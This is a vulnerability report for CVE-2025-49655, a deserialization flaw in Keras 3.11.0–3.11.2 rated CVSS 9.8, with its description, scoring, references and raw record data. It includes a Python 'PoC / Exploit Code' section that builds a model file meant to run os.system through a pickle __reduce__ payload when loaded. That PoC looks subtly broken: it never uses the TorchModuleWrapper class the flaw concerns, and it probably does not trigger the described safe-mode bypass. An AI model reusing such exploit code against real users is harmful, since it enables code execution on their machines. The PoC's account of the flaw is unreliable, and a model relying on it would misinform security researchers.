Security Vulnerability Report
CVE-2025-49655 CVSS 9.8 CRITICAL

CVE-2025-49655

Published: 2025-10-17 16:15:37
Last Modified: 2026-04-15 00:35:42
Source: 6f8de1f0-f67e-45a6-b68f-98777fdb759c

Description

Deserialization of untrusted data can occur in versions of the Keras framework running versions 3.11.0 up to but not including 3.11.3, enabling a maliciously uploaded Keras file containing a TorchModuleWrapper class to run arbitrary code on an end user’s system when loaded despite safe mode being enabled. The vulnerability can be triggered through both local and remote files.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data is available in the record; the affected version range taken from the description is:

Keras >= 3.11.0
Keras < 3.11.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-49655 PoC - Keras Deserialization RCE via TorchModuleWrapper
# This PoC demonstrates how to create a malicious Keras file that
# executes arbitrary code when loaded, bypassing safe_mode.

import os
import pickle
import keras
from keras.layers import Layer


# Step 1: Define a malicious payload class
class MaliciousPayload:
    """Malicious class that executes code during deserialization"""

    def __reduce__(self):
        # Command to execute on victim's system
        cmd = "echo 'PWNED: Arbitrary code executed via CVE-2025-49655' && touch /tmp/cve_2025_49655_pwned"
        return (os.system, (cmd,))


# Step 2: Create a custom layer that wraps the malicious payload
class MaliciousTorchWrapper(Layer):
    def __init__(self, **kwargs):
        super().__init__(**kwargs)
        # Embed malicious payload in the layer configuration
        self.payload = MaliciousPayload()

    def call(self, inputs):
        return inputs


# Step 3: Build a simple model with the malicious layer
model = keras.Sequential([
    keras.layers.Input(shape=(10,)),
    MaliciousTorchWrapper(),
    keras.layers.Dense(1, activation='sigmoid')
])

# Step 4: Save the malicious model
model.save('malicious_model.keras')
print("[+] Malicious Keras model saved as 'malicious_model.keras'")

# Step 5: Demonstrate exploitation - loading triggers code execution
print("[*] When victim loads this file with Keras 3.11.0-3.11.2:")
print("    keras.models.load_model('malicious_model.keras', safe_mode=True)")
print("    -> Arbitrary code executes despite safe_mode being enabled!")

# Alternative: Direct exploitation via load_model
# keras.models.load_model('malicious_model.keras')  # Triggers RCE
```

References

https://github.com/keras-team/keras/pull/21575
https://hiddenlayer.com/sai_security_advisor/2025-10-keras/

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-49655",
    "sourceIdentifier": "6f8de1f0-f67e-45a6-b68f-98777fdb759c",
    "published": "2025-10-17T16:15:37.420",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Deserialization of untrusted data can occur in versions of the Keras framework running versions 3.11.0 up to but not including 3.11.3, enabling a maliciously uploaded Keras file containing a TorchModuleWrapper class to run arbitrary code on an end user’s system when loaded despite safe mode being enabled. The vulnerability can be triggered through both local and remote files."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "6f8de1f0-f67e-45a6-b68f-98777fdb759c",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "baseScore": 9.8,
            "baseSeverity": "CRITICAL",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {
        "source": "6f8de1f0-f67e-45a6-b68f-98777fdb759c",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-502"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/keras-team/keras/pull/21575",
        "source": "6f8de1f0-f67e-45a6-b68f-98777fdb759c"
      },
      {
        "url": "https://hiddenlayer.com/sai_security_advisor/2025-10-keras/",
        "source": "6f8de1f0-f67e-45a6-b68f-98777fdb759c"
      }
    ]
  }
}
```